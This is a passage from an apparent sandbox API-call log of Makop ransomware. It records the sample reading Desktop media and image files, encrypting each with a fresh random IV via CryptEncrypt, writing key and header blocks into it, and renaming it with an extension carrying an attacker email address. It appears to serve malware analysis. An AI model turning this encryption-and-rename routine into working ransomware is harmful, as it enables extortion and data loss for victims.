cFileName="..", cAlternateFileName="")) returned 1 [0127.402] FindNextFileW (in: hFindFile=0x5699c8, lpFindFileData=0x245fd20 | out: lpFindFileData=0x245fd20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x121e5020, ftCreationTime.dwHighDateTime=0x1d5e011, ftLastAccessTime.dwLowDateTime=0x448842e0, ftLastAccessTime.dwHighDateTime=0x1d5e576, ftLastWriteTime.dwLowDateTime=0x448842e0, ftLastWriteTime.dwHighDateTime=0x1d5e576, nFileSizeHigh=0x0, nFileSizeLow=0x16a21, dwReserved0=0x0, dwReserved1=0xffff, cFileName="2XUODCT.m4a", cAlternateFileName="")) returned 1 [0127.402] GetProcessHeap () returned 0x550000 [0127.402] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x25e) returned 0x590b10 [0127.402] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\2XUODCT.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\2xuodct.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x4, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xac [0127.402] GetProcessHeap () returned 0x550000 [0127.402] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x10) returned 0x566008 [0127.402] CryptGenRandom (in: hProv=0x564928, dwLen=0x10, pbBuffer=0x566008 | out: pbBuffer=0x566008) returned 1 [0127.402] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x245fcb0 | out: lpNewFilePointer=0x0) returned 1 [0127.402] WriteFile (in: hFile=0xac, lpBuffer=0x245fcc0*, nNumberOfBytesToWrite=0xf, lpNumberOfBytesWritten=0x245fc90, lpOverlapped=0x0 | out: lpBuffer=0x245fcc0*, lpNumberOfBytesWritten=0x245fc90*=0xf, lpOverlapped=0x0) returned 1 [0127.403] CryptImportKey (in: hProv=0x564928, pbData=0x56ca58, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x0, phKey=0x245fc94 | out: phKey=0x245fc94*=0x56c880) returned 1 [0127.403] CryptSetKeyParam (hKey=0x56c880, dwParam=0x1, pbData=0x566008, dwFlags=0x0) returned 1 [0127.404] GetProcessHeap () returned 0x550000 [0127.404] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x40) returned 0x566d90 [0127.404] CryptEncrypt (in: hKey=0x56c880, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x566d90*, pdwDataLen=0x245fc78*=0x40, dwBufLen=0x40 | out: pbData=0x566d90*, pdwDataLen=0x245fc78*=0x40) returned 1 [0127.404] CryptDestroyKey (hKey=0x56c880) returned 1 [0127.404] WriteFile (in: hFile=0xac, lpBuffer=0x566d90*, nNumberOfBytesToWrite=0x40, lpNumberOfBytesWritten=0x245fc90, lpOverlapped=0x0 | out: lpBuffer=0x566d90*, lpNumberOfBytesWritten=0x245fc90*=0x40, lpOverlapped=0x0) returned 1 [0127.404] WriteFile (in: hFile=0xac, lpBuffer=0x245fc98*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x245fc90, lpOverlapped=0x0 | out: lpBuffer=0x245fc98*, lpNumberOfBytesWritten=0x245fc90*=0x4, lpOverlapped=0x0) returned 1 [0127.405] WriteFile (in: hFile=0xac, lpBuffer=0x566008*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x245fc90, lpOverlapped=0x0 | out: lpBuffer=0x566008*, lpNumberOfBytesWritten=0x245fc90*=0x10, lpOverlapped=0x0) returned 1 [0127.405] WriteFile (in: hFile=0xac, lpBuffer=0x569940*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x245fc90, lpOverlapped=0x0 | out: lpBuffer=0x569940*, lpNumberOfBytesWritten=0x245fc90*=0x80, lpOverlapped=0x0) returned 1 [0127.405] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x245fcb8 | out: lpNewFilePointer=0x0) returned 1 [0127.405] WriteFile (in: hFile=0xac, lpBuffer=0x245fca8*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x245fc90, lpOverlapped=0x0 | out: lpBuffer=0x245fca8*, lpNumberOfBytesWritten=0x245fc90*=0x8, lpOverlapped=0x0) returned 1 [0127.405] CryptImportKey (in: hProv=0x564928, pbData=0x56ca58, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x0, phKey=0x245fc94 | out: phKey=0x245fc94*=0x56c880) returned 1 [0127.405] CryptSetKeyParam (hKey=0x56c880, dwParam=0x1, pbData=0x566008, dwFlags=0x0) returned 1 [0127.405] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0127.405] ReadFile (in: hFile=0xac, lpBuffer=0x2250020, nNumberOfBytesToRead=0x16a21, lpNumberOfBytesRead=0x245fc9c, lpOverlapped=0x0 | out: lpBuffer=0x2250020*, lpNumberOfBytesRead=0x245fc9c*=0x16a21, lpOverlapped=0x0) returned 1 [0127.407] CryptEncrypt (in: hKey=0x56c880, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2250020*, pdwDataLen=0x245fc78*=0x16a30, dwBufLen=0x16a30 | out: pbData=0x2250020*, pdwDataLen=0x245fc78*=0x16a30) returned 1 [0127.408] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0127.408] WriteFile (in: hFile=0xac, lpBuffer=0x2250020*, nNumberOfBytesToWrite=0x16a30, lpNumberOfBytesWritten=0x245fc90, lpOverlapped=0x0 | out: lpBuffer=0x2250020*, lpNumberOfBytesWritten=0x245fc90*=0x16a30, lpOverlapped=0x0) returned 1 [0127.408] CryptDestroyKey (hKey=0x56c880) returned 1 [0127.408] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0x16b04, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0127.408] SetEndOfFile (hFile=0xac) returned 1 [0127.413] GetProcessHeap () returned 0x550000 [0127.413] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x566d90 | out: hHeap=0x550000) returned 1 [0127.413] GetProcessHeap () returned 0x550000 [0127.413] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x566008 | out: hHeap=0x550000) returned 1 [0127.413] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\2XUODCT.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\2xuodct.m4a"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\2XUODCT.m4a.[4B2E4630].[akzhq530@protonmail.com].makop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\2xuodct.m4a.[4b2e4630].[akzhq530@protonmail.com].makop")) returned 1 [0127.421] CloseHandle (hObject=0xac) returned 1 [0127.421] FindNextFileW (in: hFindFile=0x5699c8, lpFindFileData=0x245fd20 | out: lpFindFileData=0x245fd20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x49f671c0, ftCreationTime.dwHighDateTime=0x1d5e30f, ftLastAccessTime.dwLowDateTime=0x8f81a2f0, ftLastAccessTime.dwHighDateTime=0x1d5dbbc, ftLastWriteTime.dwLowDateTime=0x8f81a2f0, ftLastWriteTime.dwHighDateTime=0x1d5dbbc, nFileSizeHigh=0x0, nFileSizeLow=0x7c1a, dwReserved0=0x0, dwReserved1=0xffff, cFileName="42isaaibrWtk.wav", cAlternateFileName="42ISAA~1.WAV")) returned 1 [0127.421] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\42isaaibrWtk.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\42isaaibrwtk.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x4, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xac [0127.421] GetProcessHeap () returned 0x550000 [0127.421] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x10) returned 0x566008 [0127.421] CryptGenRandom (in: hProv=0x564928, dwLen=0x10, pbBuffer=0x566008 | out: pbBuffer=0x566008) returned 1 [0127.421] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x245fcb0 | out: lpNewFilePointer=0x0) returned 1 [0127.421] WriteFile (in: hFile=0xac, lpBuffer=0x245fcc0*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x245fc90, lpOverlapped=0x0 | out: lpBuffer=0x245fcc0*, lpNumberOfBytesWritten=0x245fc90*=0x6, lpOverlapped=0x0) returned 1 [0127.423] CryptImportKey (in: hProv=0x564928, pbData=0x56cba8, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x0, phKey=0x245fc94 | out: phKey=0x245fc94*=0x56c880) returned 1 [0127.423] CryptSetKeyParam (hKey=0x56c880, dwParam=0x1, pbData=0x566008, dwFlags=0x0) returned 1 [0127.423] GetProcessHeap () returned 0x550000 [0127.423] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x40) returned 0x566d90 [0127.423] CryptEncrypt (in: hKey=0x56c880, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x566d90*, pdwDataLen=0x245fc78*=0x40, dwBufLen=0x40 | out: pbData=0x566d90*, pdwDataLen=0x245fc78*=0x40) returned 1 [0127.423] CryptDestroyKey (hKey=0x56c880) returned 1 [0127.423] WriteFile (in: hFile=0xac, lpBuffer=0x566d90*, nNumberOfBytesToWrite=0x40, lpNumberOfBytesWritten=0x245fc90, lpOverlapped=0x0 | out: lpBuffer=0x566d90*, lpNumberOfBytesWritten=0x245fc90*=0x40, lpOverlapped=0x0) returned 1 [0127.423] WriteFile (in: hFile=0xac, lpBuffer=0x245fc98*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x245fc90, lpOverlapped=0x0 | out: lpBuffer=0x245fc98*, lpNumberOfBytesWritten=0x245fc90*=0x4, lpOverlapped=0x0) returned 1 [0127.423] WriteFile (in: hFile=0xac, lpBuffer=0x566008*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x245fc90, lpOverlapped=0x0 | out: lpBuffer=0x566008*, lpNumberOfBytesWritten=0x245fc90*=0x10, lpOverlapped=0x0) returned 1 [0127.423] WriteFile (in: hFile=0xac, lpBuffer=0x56c928*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x245fc90, lpOverlapped=0x0 | out: lpBuffer=0x56c928*, lpNumberOfBytesWritten=0x245fc90*=0x80, lpOverlapped=0x0) returned 1 [0127.423] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x245fcb8 | out: lpNewFilePointer=0x0) returned 1 [0127.423] WriteFile (in: hFile=0xac, lpBuffer=0x245fca8*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x245fc90, lpOverlapped=0x0 | out: lpBuffer=0x245fca8*, lpNumberOfBytesWritten=0x245fc90*=0x8, lpOverlapped=0x0) returned 1 [0127.424] CryptImportKey (in: hProv=0x564928, pbData=0x56cba8, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x0, phKey=0x245fc94 | out: phKey=0x245fc94*=0x56c880) returned 1 [0127.424] CryptSetKeyParam (hKey=0x56c880, dwParam=0x1, pbData=0x566008, dwFlags=0x0) returned 1 [0127.424] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0127.424] ReadFile (in: hFile=0xac, lpBuffer=0x2250020, nNumberOfBytesToRead=0x7c1a, lpNumberOfBytesRead=0x245fc9c, lpOverlapped=0x0 | out: lpBuffer=0x2250020*, lpNumberOfBytesRead=0x245fc9c*=0x7c1a, lpOverlapped=0x0) returned 1 [0127.424] CryptEncrypt (in: hKey=0x56c880, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2250020*, pdwDataLen=0x245fc78*=0x7c20, dwBufLen=0x7c20 | out: pbData=0x2250020*, pdwDataLen=0x245fc78*=0x7c20) returned 1 [0127.425] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0127.425] WriteFile (in: hFile=0xac, lpBuffer=0x2250020*, nNumberOfBytesToWrite=0x7c20, lpNumberOfBytesWritten=0x245fc90, lpOverlapped=0x0 | out: lpBuffer=0x2250020*, lpNumberOfBytesWritten=0x245fc90*=0x7c20, lpOverlapped=0x0) returned 1 [0127.425] CryptDestroyKey (hKey=0x56c880) returned 1 [0127.425] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0x7cf4, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0127.425] SetEndOfFile (hFile=0xac) returned 1 [0127.429] GetProcessHeap () returned 0x550000 [0127.429] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x566d90 | out: hHeap=0x550000) returned 1 [0127.429] GetProcessHeap () returned 0x550000 [0127.429] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x566008 | out: hHeap=0x550000) returned 1 [0127.429] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\42isaaibrWtk.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\42isaaibrwtk.wav"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\42isaaibrWtk.wav.[4B2E4630].[akzhq530@protonmail.com].makop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\42isaaibrwtk.wav.[4b2e4630].[akzhq530@protonmail.com].makop")) returned 1 [0127.517] CloseHandle (hObject=0xac) returned 1 [0127.517] FindNextFileW (in: hFindFile=0x5699c8, lpFindFileData=0x245fd20 | out: lpFindFileData=0x245fd20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbf677a70, ftCreationTime.dwHighDateTime=0x1d5e6d5, ftLastAccessTime.dwLowDateTime=0x8d04f0b0, ftLastAccessTime.dwHighDateTime=0x1d5db9c, ftLastWriteTime.dwLowDateTime=0x8d04f0b0, ftLastWriteTime.dwHighDateTime=0x1d5db9c, nFileSizeHigh=0x0, nFileSizeLow=0x18313, dwReserved0=0x0, dwReserved1=0xffff, cFileName="4NT8eTfTb_v4_BOvZwb-.m4a", cAlternateFileName="4NT8ET~1.M4A")) returned 1 [0127.517] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\4NT8eTfTb_v4_BOvZwb-.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\4nt8etftb_v4_bovzwb-.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x4, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xac [0127.517] GetProcessHeap () returned 0x550000 [0127.517] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x10) returned 0x566008 [0127.518] CryptGenRandom (in: hProv=0x564928, dwLen=0x10, pbBuffer=0x566008 | out: pbBuffer=0x566008) returned 1 [0127.518] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x245fcb0 | out: lpNewFilePointer=0x0) returned 1 [0127.518] WriteFile (in: hFile=0xac, lpBuffer=0x245fcc0*, nNumberOfBytesToWrite=0xd, lpNumberOfBytesWritten=0x245fc90, lpOverlapped=0x0 | out: lpBuffer=0x245fcc0*, lpNumberOfBytesWritten=0x245fc90*=0xd, lpOverlapped=0x0) returned 1 [0127.519] CryptImportKey (in: hProv=0x564928, pbData=0x56ca58, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x0, phKey=0x245fc94 | out: phKey=0x245fc94*=0x56c880) returned 1 [0127.519] CryptSetKeyParam (hKey=0x56c880, dwParam=0x1, pbData=0x566008, dwFlags=0x0) returned 1 [0127.519] GetProcessHeap () returned 0x550000 [0127.519] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x50) returned 0x56d278 [0127.519] CryptEncrypt (in: hKey=0x56c880, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x56d278*, pdwDataLen=0x245fc78*=0x50, dwBufLen=0x50 | out: pbData=0x56d278*, pdwDataLen=0x245fc78*=0x50) returned 1 [0127.519] CryptDestroyKey (hKey=0x56c880) returned 1 [0127.519] WriteFile (in: hFile=0xac, lpBuffer=0x56d278*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x245fc90, lpOverlapped=0x0 | out: lpBuffer=0x56d278*, lpNumberOfBytesWritten=0x245fc90*=0x50, lpOverlapped=0x0) returned 1 [0127.519] WriteFile (in: hFile=0xac, lpBuffer=0x245fc98*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x245fc90, lpOverlapped=0x0 | out: lpBuffer=0x245fc98*, lpNumberOfBytesWritten=0x245fc90*=0x4, lpOverlapped=0x0) returned 1 [0127.519] WriteFile (in: hFile=0xac, lpBuffer=0x566008*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x245fc90, lpOverlapped=0x0 | out: lpBuffer=0x566008*, lpNumberOfBytesWritten=0x245fc90*=0x10, lpOverlapped=0x0) returned 1 [0127.519] WriteFile (in: hFile=0xac, lpBuffer=0x569940*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x245fc90, lpOverlapped=0x0 | out: lpBuffer=0x569940*, lpNumberOfBytesWritten=0x245fc90*=0x80, lpOverlapped=0x0) returned 1 [0127.519] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x245fcb8 | out: lpNewFilePointer=0x0) returned 1 [0127.520] WriteFile (in: hFile=0xac, lpBuffer=0x245fca8*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x245fc90, lpOverlapped=0x0 | out: lpBuffer=0x245fca8*, lpNumberOfBytesWritten=0x245fc90*=0x8, lpOverlapped=0x0) returned 1 [0127.520] CryptImportKey (in: hProv=0x564928, pbData=0x56ca58, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x0, phKey=0x245fc94 | out: phKey=0x245fc94*=0x56c880) returned 1 [0127.520] CryptSetKeyParam (hKey=0x56c880, dwParam=0x1, pbData=0x566008, dwFlags=0x0) returned 1 [0127.520] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0127.520] ReadFile (in: hFile=0xac, lpBuffer=0x2250020, nNumberOfBytesToRead=0x18313, lpNumberOfBytesRead=0x245fc9c, lpOverlapped=0x0 | out: lpBuffer=0x2250020*, lpNumberOfBytesRead=0x245fc9c*=0x18313, lpOverlapped=0x0) returned 1 [0127.521] CryptEncrypt (in: hKey=0x56c880, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2250020*, pdwDataLen=0x245fc78*=0x18320, dwBufLen=0x18320 | out: pbData=0x2250020*, pdwDataLen=0x245fc78*=0x18320) returned 1 [0127.522] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0127.522] WriteFile (in: hFile=0xac, lpBuffer=0x2250020*, nNumberOfBytesToWrite=0x18320, lpNumberOfBytesWritten=0x245fc90, lpOverlapped=0x0 | out: lpBuffer=0x2250020*, lpNumberOfBytesWritten=0x245fc90*=0x18320, lpOverlapped=0x0) returned 1 [0127.523] CryptDestroyKey (hKey=0x56c880) returned 1 [0127.523] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0x18404, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0127.523] SetEndOfFile (hFile=0xac) returned 1 [0127.527] GetProcessHeap () returned 0x550000 [0127.527] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x56d278 | out: hHeap=0x550000) returned 1 [0127.527] GetProcessHeap () returned 0x550000 [0127.527] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x566008 | out: hHeap=0x550000) returned 1 [0127.527] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\4NT8eTfTb_v4_BOvZwb-.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\4nt8etftb_v4_bovzwb-.m4a"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\4NT8eTfTb_v4_BOvZwb-.m4a.[4B2E4630].[akzhq530@protonmail.com].makop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\4nt8etftb_v4_bovzwb-.m4a.[4b2e4630].[akzhq530@protonmail.com].makop")) returned 1 [0127.529] CloseHandle (hObject=0xac) returned 1 [0127.532] FindNextFileW (in: hFindFile=0x5699c8, lpFindFileData=0x245fd20 | out: lpFindFileData=0x245fd20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x156b5cf0, ftCreationTime.dwHighDateTime=0x1d5e61f, ftLastAccessTime.dwLowDateTime=0x4a883a80, ftLastAccessTime.dwHighDateTime=0x1d5d7d7, ftLastWriteTime.dwLowDateTime=0x4a883a80, ftLastWriteTime.dwHighDateTime=0x1d5d7d7, nFileSizeHigh=0x0, nFileSizeLow=0x2752, dwReserved0=0x0, dwReserved1=0xffff, cFileName="5tkUyoVHFRn5QDLoY7f.jpg", cAlternateFileName="5TKUYO~1.JPG")) returned 1 [0127.532] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\5tkUyoVHFRn5QDLoY7f.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\5tkuyovhfrn5qdloy7f.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x4, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xac [0127.532] GetProcessHeap () returned 0x550000 [0127.532] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x10) returned 0x566008 [0127.532] CryptGenRandom (in: hProv=0x564928, dwLen=0x10, pbBuffer=0x566008 | out: pbBuffer=0x566008) returned 1 [0127.532] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x245fcb0 | out: lpNewFilePointer=0x0) returned 1 [0127.532] WriteFile (in: hFile=0xac, lpBuffer=0x245fcc0*, nNumberOfBytesToWrite=0xe, lpNumberOfBytesWritten=0x245fc90, lpOverlapped=0x0 | out: lpBuffer=0x245fcc0*, lpNumberOfBytesWritten=0x245fc90*=0xe, lpOverlapped=0x0) returned 1 [0127.534] CryptImportKey (in: hProv=0x564928, pbData=0x56cba8, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x0, phKey=0x245fc94 | out: phKey=0x245fc94*=0x56c880) returned 1 [0127.534] CryptSetKeyParam (hKey=0x56c880, dwParam=0x1, pbData=0x566008, dwFlags=0x0) returned 1 [0127.534] GetProcessHeap () returned 0x550000 [0127.534] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x50) returned 0x56d278 [0127.534] CryptEncrypt (in: hKey=0x56c880, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x56d278*, pdwDataLen=0x245fc78*=0x50, dwBufLen=0x50 | out: pbData=0x56d278*, pdwDataLen=0x245fc78*=0x50) returned 1 [0127.534] CryptDestroyKey (hKey=0x56c880) returned 1 [0127.534] WriteFile (in: hFile=0xac, lpBuffer=0x56d278*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x245fc90, lpOverlapped=0x0 | out: lpBuffer=0x56d278*, lpNumberOfBytesWritten=0x245fc90*=0x50, lpOverlapped=0x0) returned 1 [0127.534] WriteFile (in: hFile=0xac, lpBuffer=0x245fc98*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x245fc90, lpOverlapped=0x0 | out: lpBuffer=0x245fc98*, lpNumberOfBytesWritten=0x245fc90*=0x4, lpOverlapped=0x0) returned 1 [0127.534] WriteFile (in: hFile=0xac, lpBuffer=0x566008*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x245fc90, lpOverlapped=0x0 | out: lpBuffer=0x566008*, lpNumberOfBytesWritten=0x245fc90*=0x10, lpOverlapped=0x0) returned 1 [0127.534] WriteFile (in: hFile=0xac, lpBuffer=0x56c928*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x245fc90, lpOverlapped=0x0 | out: lpBuffer=0x56c928*, lpNumberOfBytesWritten=0x245fc90*=0x80, lpOverlapped=0x0) returned 1 [0127.534] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x245fcb8 | out: lpNewFilePointer=0x0) returned 1 [0127.534] WriteFile (in: hFile=0xac, lpBuffer=0x245fca8*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x245fc90, lpOverlapped=0x0 | out: lpBuffer=0x245fca8*, lpNumberOfBytesWritten=0x245fc90*=0x8, lpOverlapped=0x0) returned 1 [0127.534] CryptImportKey (in: hProv=0x564928, pbData=0x56cba8, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x0, phKey=0x245fc94 | out: phKey=0x245fc94*=0x56c880) returned 1 [0127.535] CryptSetKeyParam (hKey=0x56c880, dwParam=0x1, pbData=0x566008, dwFlags=0x0) returned 1 [0127.535] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0127.535] ReadFile (in: hFile=0xac, lpBuffer=0x2250020, nNumberOfBytesToRead=0x2752, lpNumberOfBytesRead=0x245fc9c, lpOverlapped=0x0 | out: lpBuffer=0x2250020*, lpNumberOfBytesRead=0x245fc9c*=0x2752, lpOverlapped=0x0) returned 1 [0127.535] CryptEncrypt (in: hKey=0x56c880, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2250020*, pdwDataLen=0x245fc78*=0x2760, dwBufLen=0x2760 | out: pbData=0x2250020*, pdwDataLen=0x245fc78*=0x2760) returned 1 [0127.535] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0127.535] WriteFile (in: hFile=0xac, lpBuffer=0x2250020*, nNumberOfBytesToWrite=0x2760, lpNumberOfBytesWritten=0x245fc90, lpOverlapped=0x0 | out: lpBuffer=0x2250020*, lpNumberOfBytesWritten=0x245fc90*=0x2760, lpOverlapped=0x0) returned 1 [0127.535] CryptDestroyKey (hKey=0x56c880) returned 1 [0127.535] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0x2844, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0127.535] SetEndOfFile (hFile=0xac) returned 1 [0127.539] GetProcessHeap () returned 0x550000 [0127.539] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x56d278 | out: hHeap=0x550000) returned 1 [0127.539] GetProcessHeap () returned 0x550000 [0127.539] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x566008 | out: hHeap=0x550000) returned 1 [0127.539] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\5tkUyoVHFRn5QDLoY7f.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\5tkuyovhfrn5qdloy7f.jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\5tkUyoVHFRn5QDLoY7f.jpg.[4B2E4630].[akzhq530@protonmail.com].makop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\5tkuyovhfrn5qdloy7f.jpg.[4b2e4630].[akzhq530@protonmail.com].makop")) returned 1 [0127.558] CloseHandle (hObject=0xac) returned 1 [0127.558] FindNextFileW (in: hFindFile=0x5699c8, lpFindFileData=0x245fd20 | out: lpFindFileData=0x245fd20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd7e631b0, ftCreationTime.dwHighDateTime=0x1d5e2f5, ftLastAccessTime.dwLowDateTime=0x63187440, ftLastAccessTime.dwHighDateTime=0x1d5e419, ftLastWriteTime.dwLowDateTime=0x63187440, ftLastWriteTime.dwHighDateTime=0x1d5e419, nFileSizeHigh=0x0, nFileSizeLow=0xcb10, dwReserved0=0x0, dwReserved1=0xffff, cFileName="7T2oGF7zDJqV.swf", cAlternateFileName="7T2OGF~1.SWF")) returned 1 [0127.558] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7T2oGF7zDJqV.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\7t2ogf7zdjqv.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x4, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, 